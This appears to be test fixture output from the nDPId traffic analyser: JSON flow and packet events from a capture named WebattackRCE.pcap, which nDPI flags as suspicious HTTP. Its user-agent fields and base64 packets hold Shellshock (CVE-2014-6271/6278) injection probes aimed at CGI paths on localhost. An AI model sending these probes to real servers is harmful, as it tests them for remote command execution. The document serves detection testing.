-01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":1,"flow_last_seen":1576420277446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277446,"pkt":"AAAAAAAAAAAAAAAACABFAAELQstAAEAG+R9\/AAABfwAAAcVeH5AckXoZTNNhQ4AYAED+\/wAAAQEICp1m\/e6dZv3uR0VUIC9zZXJ2ZXIucGhwIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KDQo="} -01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/server.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":1,"flow_last_seen":1576420277448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1576420277448,"pkt":"AAAAAAAAAAAAAAAACABFAAEHr2pAAEAGjIR\/AAABfwAAAcVgH5ABL5e76\/gzuYAYAED++wAAAQEICp1m\/fCdZv3wR0VUIC9zdGF0dXMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/status","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":1,"flow_last_seen":1576420277449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277449,"pkt":"AAAAAAAAAAAAAAAACABFAAELeuBAAEAGwQp\/AAABfwAAAcViH5Bf0UINj\/XlzYAYAED+\/wAAAQEICp1m\/fGdZv3xR0VUIC9zeXNpbmZvLnBsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sysinfo.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":1,"flow_last_seen":1576420277451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277451,"pkt":"AAAAAAAAAAAAAAAACABFAAEFPsFAAEAG\/S9\/AAABfwAAAcVkH5CmDwZuBlGlyYAYAED++QAAAQEICp1m\/fOdZv3zR0VUIC90ZXN0IEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":1,"flow_last_seen":1576420277452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277452,"pkt":"AAAAAAAAAAAAAAAACABFAAEJ+UlAAEAGQqN\/AAABfwAAAcVmH5C1jMGV60p+W4AYAED+\/QAAAQEICp1m\/fSdZv30R0VUIC90ZXN0LWNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":1,"flow_last_seen":1576420277454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277454,"pkt":"AAAAAAAAAAAAAAAACABFAAEJpZBAAEAGllx\/AAABfwAAAcVoH5CGpZ1eF0nj7YAYAED+\/QAAAQEICp1m\/fadZv32R0VUIC90ZXN0LmNnaSBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":1,"flow_last_seen":1576420277455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277455,"pkt":"AAAAAAAAAAAAAAAACABFAAENkNNAAEAGqxV\/AAABfwAAAcVqH5AR5agGdIx514AYAED\/AQAAAQEICp1m\/fedZv33R0VUIC90ZXN0X2NnaS5waHAgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":1,"flow_last_seen":1576420277458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277458,"pkt":"AAAAAAAAAAAAAAAACABFAAENOM9AAEAGAxp\/AAABfwAAAcVsH5CGwwAaI+XJXIAYAED\/AQAAAQEICp1m\/fqdZv36R0VUIC90ZXN0LmNnaS5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":1,"flow_last_seen":1576420277459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277459,"pkt":"AAAAAAAAAAAAAAAACABFAAEMfPpAAEAGvu9\/AAABfwAAAcVuH5CbL0QudOlGT4AYAED\/AAAAAQEICp1m\/fudZv37R0VUIC90ZXN0X2NnaS5wbCBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
